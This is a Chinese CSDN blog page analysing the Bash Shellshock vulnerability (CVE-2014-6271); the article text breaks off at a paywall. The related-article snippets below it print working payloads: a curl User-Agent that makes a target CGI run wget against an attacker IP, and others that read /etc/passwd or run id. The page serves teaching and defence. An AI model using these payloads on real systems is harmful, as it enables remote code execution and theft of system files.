bash破壳漏洞分析(二)

最新推荐文章于 2024-05-28 13:53:41 发布
最新推荐文章于 2024-05-28 13:53:41 发布
阅读量2k 收藏 1
点赞数 2
分类专栏: 漏洞 文章标签: 漏洞 bash 破壳漏洞 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yaofeiNO1/article/details/55212204
版权
本文详细介绍了Bash破壳漏洞,分析了漏洞的定义、影响及数据包特征。通过环境变量的特殊构造,该漏洞可能导致远程代码执行。文章通过实例展示了如何构造探测数据包,并讨论了漏洞的影响,包括SSH、Apache CGI和DHCP客户端等场景。
摘要由CSDN通过智能技术生成

1. Bash简介

1.1 定义

   Bash(GNU Bourne-Again Shell)是许多Linux发行版的默认Shell。

1.2 概述

   目前的Bash使用的环境变量是通过函数名称来调用的,导致漏洞出问题是以“() {”开头定义的环境变量在命令ENV中解析成函数后,Bash执行并未退出,而是继续解析并执行shell命令。而其核心的原因在于在输入的过滤中没有严格限制边界,也没有做出合法化的参数判断。
   从阐述的漏洞原理可知,漏洞的根本原因存在于Bash的ENV命令实现上,因此漏洞本身是不能够直接导致远程代码执行的。如果达到远程代码执行的目的,必须要借助第三方服务程序作为媒介才能够实现,第三方服务程序也必须要满足众多条件才可以充当此媒介的角色。目前自己已验证第三方服务程序apache2便可充当此媒介,其CGI组件满足远程访问并调用Bash的ENV命令进行访问数据解析功能。具体如何实现,参见下面的原理图:CVE-2014-6271漏洞实现远程代码执行原理图。

2. 数据包分析

   Bash远程代码执行漏洞主要是以“() {”开头定义的环境变量在命令ENV中解析成函数后,Bash执行并未退出,而是继续解析并执行shell命令。所以在数据包的payload构造时我们需要构造一个以“() {”开头的环境变量以及一段可执行的shell脚本。通过python将请求数据发送至服务器,Apache的cgi组件远程访问并调用Bash的ENV命令进行访问数据解析功能,执行payload脚本。

2.1 探测数据包

   具体流程如下:

  • 在含有破壳漏洞的bash版本的虚拟机(Ubuntu12.04)中对Apac
最低0.47元/天 解锁文章
fly小灰灰
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
漏洞修复步骤
10-10
漏洞,又称为Shellshock漏洞,是一个严重的安全漏洞,影响了广泛使用的Bash shell。这个漏洞在2014年被发现,允许攻击者通过精心构造的环境变量注入恶意代码,从而控制受感染的系统。Bash是Unix和Linux系统中的...
安鸾之RCE系列
柠鹿的轨迹
08-28 804
0x00 webshell&中国菜刀 0o00 题目提示 0o01 执行过程 0x01 命令执行01 0o00 题目提示 0o01 Linux命令符 0o02 执行过程 0x02 漏洞 0o00 题目提示 0o01 ShellShock 0o01 执行过程 0x03 PHPmailer 0o00 题目提示 0o01 phpMailer 0o02 执行过程 0x04 命令执行02 0o00 题目提示 0o01 DNSlog 0o01 执行过程...
漏洞的原理与利用
weixin_54992237的博客
10-15 220
使用ssh登录蠕虫发起者主机(10.1.1.231),执行下面三条命令。命令执行结果如下图所示。 [root@worm-master ~]# tail /var/log/httpd/access_log [root@worm-master ~]# curl -A “() { :; }; /usr/bin/wget http://10.1.1.231/shock” http://10.1.1.12/test.cgi [root@worm-master ~]# tail /var/log/httpd/ac
Bash Bug(漏洞,Shellshock) - CVE-2014-6271
最新发布
HaSaKing的博客
05-28 449
漏洞是对全球数以百万计的系统构成威胁的严重安全漏洞。通过理解其原理并学习如何检测和修补,您可以显著提高自己系统的安全性。始终保持系统和软件的最新状态是保护自己免受此类漏洞攻击的关键策略。
漏洞(CVE-2014-6271)综合分析:“漏洞系列分析之二
chengfangang的专栏
10-25 1407
一、“漏洞概述 我们团队于9月25日10时发布了《“漏洞(CVE-2014-6271)综合分析》,并更新了多个版本。在这个过程中,我们的监测采集和样本交换体系发现了大量利用该漏洞的扫描攻击、后门投放等行为,并发现了多个与此漏洞相关的恶意代码。 二、网络数据包 基于漏洞的特点,我们利用与高校联合部署的“探云“体系等进行了流量监测。发现了捕获了部分网络攻击行为,下面列举一个攻击包进行
漏洞(CVE-2014-6271)综合分析
Star——Flying in the cyberspace
11-25 2894
目 录 一、 威胁卡片  二、 概述  三、 已知事件发布/披露情况 四、 漏洞的影响范围  五、 漏洞原理  六、 漏洞验证方法  七、 漏洞检测方法  八、 漏洞可能会带来的影响  九、 针对此漏洞的建议  十、 写在最后的啰嗦的话      一、     威胁卡片 二、概述        2014年9月24日Bash被公布存在远程代码执行漏洞,安天实验室
vulhub漏洞复现之bash(Shellshock CVE-2014-6271)
weixin_43071873的博客
11-27 1242
Shellshock 漏洞 CVE-2014-6271 1.漏洞概述: GNU Bash 4.3及之前版本在评估某些构造的环境变量时存在安全漏洞,向环境变量值内的函数定义后添加多余的字符串会触发此漏洞,攻击者可利用此漏洞改变或绕过环境限制,以执行shell命令。某些服务和应用允许未经身份验证的远程攻击者提供环境变量以利用此漏洞。此漏洞源于在调用bash shell之前可以用构造的值创建环境变量。这些变量可以包含代码,在shell被调用后会被立即执行。 2.漏洞影响:GNU Bash <= 4.3
BASH(漏洞)Redhat系统检测和修补
10-16
**BASH(漏洞)详解** BASH,全称Bourne-Again SHell,是Linux和类UNIX系统中默认的命令行解释器,是用户与操作系统交互的重要工具。2014年,一个名为"Shellshock"的安全漏洞BASH中被发现,这被称为"BASH漏洞...
SUSE11.1漏洞补丁
10-09
SUSE11.1漏洞补丁 bash-3.2-147.20.1.x86_64.rpm
漏洞最新linux补丁把谁4.3
10-08
漏洞(Shellshock)是2014年发现的一个严重的Linux和Unix系统安全漏洞,影响了广泛使用的Bash shell。Bash是GNU项目的一部分,是Linux和类Unix操作系统中的命令行解释器,用于处理用户输入的命令。这个漏洞允许...
漏洞(shellshock)RHEL 4(32位)补丁
10-13
[root@localhost ~]# rpm -Uvh --force bash-3.0-27.0.2.el4.i386.rpm warning: bash-3.0-27.0.2.el4.i386.rpm: V3 DSA signature: NOKEY, key ID b38a8516 Preparing... ########################################...
漏洞(ShellShock)官方修补补丁(2014.10.05)
10-13
修补了包括CVE-2014-6271(最原始的漏洞)、CVE-2014-7169、CVE-2014-7186、CVE-2014-7187、CVE-2014-6277和CVE-2014-6278。这些Bash漏洞现在都是漏洞集中的,目前所有补丁,截止2014.10.05的官方补丁已经全部修补完成。压缩包内有一个检测脚本,只针对前几个流传广泛的6271、7169、7186等检测,后面几个没有检测。感兴趣的可以试一试。没有积分的可以去官网下载,这个是官方补丁整理后的,适合下载手动修补研究的。修补命令为: for BP in `ls bash43-*|grep -v sig`; do patch -p0 < $BP; done ./configure sudo make sudo make install
Bash漏洞
weixin_33911824的博客
07-30 217
”是一个严重漏洞的别名,在Red Hat、CentOS、Ubuntu 、Fedora 、Amazon Linux 、OS X 10.10中均拥有存在CVE-2014-6271(即“漏洞漏洞Bash版本,同时由于Bash在各主流操作系统的广泛应用,此漏洞的影响范围包括但不限于大多数应用Bash的Unix、Linux、Mac OS X,而针对这些操作系统管理下...
bash漏洞反弹shell
3569
07-29 4813
0x00 漏洞原理在bash里边输入~ export name='() { echo "inside name";}; echo "outside name";'查看环境变量~ env|grep name ~ name=() { echo "inside name";}; echo "outside name";这时你会发现当进入子shell的时候,直接输出 outside name~ bas
Shellshock()系列漏洞简要分析及检测
Traxer的学习之路
03-13 4482
1.漏洞简介2.POC验证2.1 CVE 2014-6271最开始的shell测试脚本如下,主要的代码是第五行,它先使用env命令将() { :;}; echo vulnerable赋值给环境变量x,随后启动一个新的bash进程并执行命令echo test,并将错误信息重定向到null,再查找有无’vulnerable’这个字符串输出,如果输出成功则表示存在漏洞:#!/bin/bash EXITCO
【vulhub】shellshock-bash漏洞复现与利用
qq_45300786的博客
09-13 812
详细说明请看 https://www.cnblogs.com/cute-puli/p/14649873.html 楼主这里只做实验 3个exp exp1 curl -A "() { :; }; echo; /bin/cat /etc/passwd" http://192.168.100.34:8080/victim.cgi exp2 User-Agent: () { foo; }; echo Content-Type: text/plain; echo; /usr/bin/id exp3 User-
bash(CVE-2014-6271) shellshock-漏洞复现
weixin_45095113的博客
01-03 505
bash(CVE-2014-6271) shellshock-漏洞复现
bash漏洞分析(一)
fly小灰灰的专栏
02-15 3830
1. 简介   bash远程代码执行漏洞,该漏洞会影响目前主流的Linux和Mac OSX操作系统平台,包括但不限于Redhat,CentOS,Ubuntu,Debian,Fedora,Amaron Linux,OSX10.10等平台。该漏洞可以通过构造环境变量的值来执行想要执行的攻击代码脚本,会影响到与bash交互的多种应用,包括HTTP,OpenSSH,DHCP等。    针对本次漏洞的检测,需
linux 漏洞,Bash漏洞
weixin_42138376的博客
05-21 1122
”是一个严重漏洞的别名,在Red Hat、CentOS、Ubuntu、Fedora、Amazon Linux、OS X 10.10中均拥有存在CVE-2014-6271(即“漏洞)漏洞Bash版本,同时由于Bash在各主流操作系统的广泛应用,此漏洞的影响范围包括但不限于大多数应用Bash的Unix、Linux、Mac OS X,而针对这些操作系统管理下的数据均存在高危威胁。漏洞的利用...
zsh和bash的优缺点分析
07-08
zsh的优点: 1. 更强大的自动完成功能:zsh具有更高级的自动完成功能,可以根据历史记录和上下文提供更准确的建议。 2. 更灵活的配置选项:zsh提供了丰富的配置选项,可以通过定制配置文件来实现个性化设置。 3. 更好的拼写纠正:zsh可以自动纠正输入命令中的拼写错误,减少用户输入错误的可能性。 4. 更强大的模式匹配:zsh支持更复杂的模式匹配语法,可以更灵活地进行文件和目录操作。 5. 更好的历史命令管理:zsh提供了更多的历史命令操作和搜索功能,方便用户查找和重复执行过去的命令。 bash的优点: 1. 广泛使用:bash是默认的shell程序,几乎所有的Linux和Unix系统都支持并预装了bash。这使得大多数脚本和教程都是基于bash编写的。 2. 更好的兼容性:由于bash的广泛使用,它对于其他程序和脚本的兼容性较好,可以更方便地与其他工具进行集成。 3. 速度较快:尽管差异不大,但bash的执行速度相对较快。 zsh的缺点: 1. 学习曲线较陡峭:相对于bash,zsh的语法和配置选项较为复杂,需要一定的学习和适应时间。 2. 安装和配置麻烦:由于zsh并非默认安装,需要手动安装并配置才能使用。 bash的缺点: 1. 自动完成和拼写纠正功能较弱:相对于zsh,bash的自动完成和拼写纠正功能相对较弱。 2. 配置选项有限:相比zsh,bash的配置选项相对较少,个性化定制程度较低。 总体而言,zsh在功能和灵活性方面更为出色,但对于一些简单的任务和兼容性要求不高的场景,bash仍然是一个可靠且广泛使用的选择。选择使用哪种shell程序应根据个人需求和偏好来决定。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值